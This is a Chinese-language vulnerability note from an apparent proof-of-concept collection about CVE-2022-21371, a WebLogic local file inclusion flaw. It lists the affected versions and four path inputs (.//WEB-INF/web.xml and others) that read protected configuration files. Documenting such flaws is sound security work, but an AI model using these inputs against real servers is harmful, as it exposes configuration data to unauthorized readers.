Awesome-POC/Web服务器漏洞/WebLogic Local File Inclusion 本地文件包含漏洞 CVE-2022-21371.md
2022-05-25 16:51:48 +08:00

22 lines
736 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# WebLogic Local File Inclusion 本地文件包含漏洞 CVE-2022-21371
## 漏洞描述
2022年1月19日绿盟科技CERT监测发现Oracle官方发布了1月关键补丁更新公告CPUCritical Patch Update此次共修复了497个不同程度的漏洞此次安全更新涉及Oracle WebLogic Server、Oracle MySQL、Oracle Java SE、Oracle FusionMiddleware、Oracle Retail Applications等多个常用产品。Oracle强烈建议客户尽快应用关键补丁更新修复程序对漏洞进行修复。
## 漏洞影响
```
WebLogic Server 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0
```
## 漏洞复现
验证POC
```
.//META-INF/MANIFEST.MF
.//WEB-INF/web.xml
.//WEB-INF/portlet.xml
.//WEB-INF/weblogic.xml
```